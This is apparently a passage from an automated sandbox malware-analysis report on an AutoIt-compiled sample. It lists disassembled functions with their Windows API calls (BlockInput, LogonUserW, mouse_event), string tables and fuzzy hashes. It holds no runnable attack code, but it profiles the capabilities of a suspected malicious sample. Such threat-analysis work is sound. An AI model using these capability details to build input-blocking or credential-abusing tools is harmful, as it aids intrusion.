                    • Opcode Fuzzy Hash: 34fff5d788b9196fb0e52e232185f936c6f053ae5fd39e238c66c91be3fba776
                    • Instruction Fuzzy Hash: 57B09231058208EBCA102B91EC09B88BF68EB45AB2F408120F60D84860CF6654508A99
                    Function 006AF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a227d1adfe87fc9ffa41de09f64804bed4111934d09e5e6d9b9dab0ca6a448fa
                    • Instruction ID: d5fb2196edd19bd23705becd7f3529629d94c4bbe26b574e8da6e60b9f98bd95
                    • Opcode Fuzzy Hash: a227d1adfe87fc9ffa41de09f64804bed4111934d09e5e6d9b9dab0ca6a448fa
                    • Instruction Fuzzy Hash: 66326961D69F014DD7276638D832376A25AAFB73D4F10D737F81AB5AA6EB2CC8834101
                    Function 006B267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: facaad7e99bd0b92179efba115b0fd642f7baf71ea6420d089f3853f44bf4a2c
                    • Instruction ID: 7178aa587a867baa789b72dbe64c2e3bcc2218de851055b7cbc59f79e238239e
                    • Opcode Fuzzy Hash: facaad7e99bd0b92179efba115b0fd642f7baf71ea6420d089f3853f44bf4a2c
                    • Instruction Fuzzy Hash: 51B1FF20E2AF514DD323963D8831336BA8CAFBB2D5F51D71BFC2674DA2EB2585834245
                    Function 006F41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • BlockInput.USER32(00000001), ref: 006F4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: d9c7010cc6d7d100366a4d22cd35bc43353874889de1be12cccf3d0da8e41bb1
                    • Instruction ID: c02b78977b354d43017b730e997fe720624e09945198fc797e623f9165d758ca
                    • Opcode Fuzzy Hash: d9c7010cc6d7d100366a4d22cd35bc43353874889de1be12cccf3d0da8e41bb1
                    • Instruction Fuzzy Hash: 97E04F312402189FC710EF5AD844AABF7E9AF98760F04812AFD4AC7752DE71E941CBA4
                    Function 006E4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 006E4F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: 352f1e5027bc8659deab2c121f3f56dc85118155ff6ed68dc7b37a0b6de6010d
                    • Instruction ID: dce42288fbc5b4e7f88cde35d87a04ce0e38f7813cbf035d8c1bf89002f35a40
                    • Opcode Fuzzy Hash: 352f1e5027bc8659deab2c121f3f56dc85118155ff6ed68dc7b37a0b6de6010d
                    • Instruction Fuzzy Hash: ABD09EF416A78579FC284B32AC1FFB6110BE3C1F91F945989720195AC2ACE5A855A039
                    Function 006D8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006D88D1), ref: 006D8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: 247275395627417def5649869e5eed50297892ed30e6664007da84977c18c746
                    • Instruction ID: 31af07af6805603e2b0da2a8110cb0ce937df65b2914aa4b79fe3d012d760e86
                    • Opcode Fuzzy Hash: 247275395627417def5649869e5eed50297892ed30e6664007da84977c18c746
                    • Instruction Fuzzy Hash: 96D05E3226050EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835AB60
                    Function 006C2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 006C2242
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 416d74d785e7fa00c0632bdaee4eb2fdc1f82df6b1c126df7b6cb25d386f5f34
                    • Instruction ID: 600865cdfc480a97d732216231f59cda9256f22adb89f1b41929bfa520faea53
                    • Opcode Fuzzy Hash: 416d74d785e7fa00c0632bdaee4eb2fdc1f82df6b1c126df7b6cb25d386f5f34
                    • Instruction Fuzzy Hash: ACC04CF1C00109DBDB15DB90DA88DFE77BCAB05304F104155E101F2101D7749B448E71
                    Function 006AA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 006AA36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: ac02b205b201b193d2cb04abf9f4f68c4efe65e7c74f93edb7cbc40b48ecca0b
                    • Instruction ID: c0f79c235270fd9ead0a3a7fa775377a2ed577f29e058691eb58fadf052d7dfb
                    • Opcode Fuzzy Hash: ac02b205b201b193d2cb04abf9f4f68c4efe65e7c74f93edb7cbc40b48ecca0b
                    • Instruction Fuzzy Hash: B2A0113000820CEBCA002B82EC08888BFACEA002A0B008020F80C808228B32A8208A88
                    Function 00698A0E Relevance: .6, Instructions: 608COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fafbd79944b334d98dc1f87b7b2f664b725811e57a63e989936b9e2ed833a716
                    • Instruction ID: 5aff76bd8b112ac4c20e176f9368dd071d5967854f7a076562f0e33191d4cc05
                    • Opcode Fuzzy Hash: fafbd79944b334d98dc1f87b7b2f664b725811e57a63e989936b9e2ed833a716
                    • Instruction Fuzzy Hash: 33221630905656CFDF288B28C4946BD77A7EB42304F68846BD8439BF92DB34DD82DB61
                    Function 006A2405 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 790e307e4cd4757230deaac9a37a2eab12ecb7d6f250bd479a8eb44335191a48
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: F6C183322450A30ADB5D563DD4340BEBAE25EA37B131A175DE4B2CF6C5EF20ED64DA20
                    Function 006A283A Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 057768de2c57982ec9cc71141e09a689186bcc0a7d75f866567e8a8d6858d27e
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 69C1A4322451A30ADF6D563E843407EBBE25A937B131A075DE4B3DF6C5EF20ED249A20
                    Function 007037F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,0070F910), ref: 007038AF
                    • IsWindowVisible.USER32(?), ref: 007038D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: d663e39bcbd998690d83d28323d1cd364b32fe104f9c90c7f5d4c38b2bdd0259
                    • Instruction ID: c836064678c9193869c913fcf442cd31bfd984ce54af8b41e416e0246b26cc77
                    • Opcode Fuzzy Hash: d663e39bcbd998690d83d28323d1cd364b32fe104f9c90c7f5d4c38b2bdd0259
                    • Instruction Fuzzy Hash: A8D18F70204205CBDB54FF10C491A6A77EAAF94344F14866DF8869B3E3CB39EE0ACB55
                    Function 0070A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                    Download Yara Rule
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 0070A89F
                    • GetSysColorBrush.USER32(0000000F), ref: 0070A8D0
                    • GetSysColor.USER32(0000000F), ref: 0070A8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 0070A8F6
                    • SelectObject.GDI32(?,?), ref: 0070A905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0070A930
                    • GetSysColor.USER32(00000010), ref: 0070A938
                    • CreateSolidBrush.GDI32(00000000), ref: 0070A93F
                    • FrameRect.USER32(?,?,00000000), ref: 0070A94E
                    • DeleteObject.GDI32(00000000), ref: 0070A955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0070A9A0
                    • FillRect.USER32(?,?,?), ref: 0070A9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 0070A9FD
                      • Part of subcall function 0070AB60: GetSysColor.USER32(00000012), ref: 0070AB99
                      • Part of subcall function 0070AB60: SetTextColor.GDI32(?,?), ref: 0070AB9D
                      • Part of subcall function 0070AB60: GetSysColorBrush.USER32(0000000F), ref: 0070ABB3
                      • Part of subcall function 0070AB60: GetSysColor.USER32(0000000F), ref: 0070ABBE
                      • Part of subcall function 0070AB60: GetSysColor.USER32(00000011), ref: 0070ABDB
                      • Part of subcall function 0070AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0070ABE9
                      • Part of subcall function 0070AB60: SelectObject.GDI32(?,00000000), ref: 0070ABFA
                      • Part of subcall function 0070AB60: SetBkColor.GDI32(?,00000000), ref: 0070AC03
                      • Part of subcall function 0070AB60: SelectObject.GDI32(?,?), ref: 0070AC10
                      • Part of subcall function 0070AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0070AC2F
                      • Part of subcall function 0070AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0070AC46
                      • Part of subcall function 0070AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0070AC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 617626b9db44557d77aac3cec92660d292b6188aa97150d1a65bf77446caebde
                    • Instruction ID: 88aa41e38b02365e7fbca3f2d905dd239c78006cdad69e0f37ffa503d2240430
                    • Opcode Fuzzy Hash: 617626b9db44557d77aac3cec92660d292b6188aa97150d1a65bf77446caebde
                    • Instruction Fuzzy Hash: 78A17C72108305FFD7219F64DC08A6B7BE9FB89321F108B29F962961E0DB79D844CB56
                    Function 00682C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00682CA2
                    • DeleteObject.GDI32(00000000), ref: 00682CE8
                    • DeleteObject.GDI32(00000000), ref: 00682CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00682CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00682D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 006BC68B
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006BC6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006BCAED
                      • Part of subcall function 00681B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00682036,?,00000000,?,?,?,?,006816CB,00000000,?), ref: 00681B9A
                    • SendMessageW.USER32(?,00001053), ref: 006BCB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006BCB41
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006BCB57
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006BCB62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: c367e2e3cca650e67cb7e5d02a42f6de55363b956940c2707c02e72932bb047e
                    • Instruction ID: 14fddfe6b718c305bb2e5ee923102b169faca590f2027c57e48f0ba90b23331b
                    • Opcode Fuzzy Hash: c367e2e3cca650e67cb7e5d02a42f6de55363b956940c2707c02e72932bb047e
                    • Instruction Fuzzy Hash: 8912A170600202EFDB60DF24C894BE9BBE6BF45320F544679F596DB652CB31E982CB51
                    Function 006F77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 006F77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006F78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006F78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006F7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006F7946
                    • GetClientRect.USER32(00000000,?), ref: 006F7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 006F7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006F79A5
                    • GetStockObject.GDI32(00000011), ref: 006F79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 006F79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006F79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006F79D2
                    • DeleteDC.GDI32(00000000), ref: 006F79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006F7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 006F7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006F7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006F7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 006F7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 006F7AAE
                    • GetStockObject.GDI32(00000011), ref: 006F7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006F7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006F7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 5020dce9c537dc5ccddd44b1a025e2a56c8ecd64a2ae3e7233f79f8349fe9195
                    • Instruction ID: 9f6a0984509cae481af3010a2ee8f750bcb2364947832978dfa39ee2bc46c45a
                    • Opcode Fuzzy Hash: 5020dce9c537dc5ccddd44b1a025e2a56c8ecd64a2ae3e7233f79f8349fe9195
                    • Instruction Fuzzy Hash: 14A17571A40209BFEB14DB64DC49FAE7BB9FB45710F048215FA15A72E0DBB4AD00CB64
                    Function 006EAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 006EAF89
                    • GetDriveTypeW.KERNEL32(?,0070FAC0,?,\\.\,0070F910), ref: 006EB066
                    • SetErrorMode.KERNEL32(00000000,0070FAC0,?,\\.\,0070F910), ref: 006EB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 2221249403606f0ccc774a9a75de408d72d9190dbd3ecb9b85455d567595eb32
                    • Instruction ID: 0a723fe2b5e1475b7856fc3abf46edde05ce15bdf20aba3b8777da89aa0db5e2
                    • Opcode Fuzzy Hash: 2221249403606f0ccc774a9a75de408d72d9190dbd3ecb9b85455d567595eb32
                    • Instruction Fuzzy Hash: 3951E570682385FBCB10EB12C9D3CFE73B3AB14351B245119E446A7392CB79AD42CB46
                    Function 00686A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
